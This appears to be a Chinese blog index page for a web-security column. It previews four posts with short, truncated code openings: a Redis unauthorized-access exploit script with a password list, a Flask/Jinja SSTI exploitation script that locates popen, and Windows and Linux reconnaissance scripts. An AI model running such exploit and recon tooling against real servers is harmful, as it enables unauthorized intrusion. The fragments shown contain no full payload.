web安全
关注
分享
扫一扫
鑫达达
这个作者很懒,什么都没留下…
展开
-
redis未授权漏洞利用脚本
#! /usr/bin/env python# _*_ coding:utf-8 _*_import socketimport sysimport osclass PAYLOAD(object): def __init__(self,ip,port,timeout): self.ip=ip self.port=port self.timeout=timeout self.PASSWORD_DIC=['redis','ro原创 2021-02-14 23:57:41 · 727 阅读 · 0 评论 -
SSTI利用脚本
import requestsheaders={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0'}def find_popen(url,payload): '发现popen在object中的位置' num=0 while True: try: payload1 = '{'+payload.form原创 2021-02-14 23:56:48 · 525 阅读 · 1 评论 -
windows信息收集自动化脚本
import os#!encoding=utf-8class information_collecting(object): def __init__(self): self.system_info_commands={'windows版本信息\n':'ver','windows系统信息\n':'systeminfo','wmic os list brief\n':'wmic os list brief'} self.process_info_command=原创 2021-02-14 23:55:12 · 965 阅读 · 2 评论 -
LINUX自动化信息收集脚本
#!/usr/bin/python3import os#!encoding=utf-8class information_collecting(object): def __init__(self): self.system_info_commands={'linux系统信息(uname -a)\n':'uname -a','linux系统信息(cat /etc/issue)\n':'cat /etc/issue','linux发行版本(cat /etc/*-release原创 2021-02-14 23:54:04 · 522 阅读 · 0 评论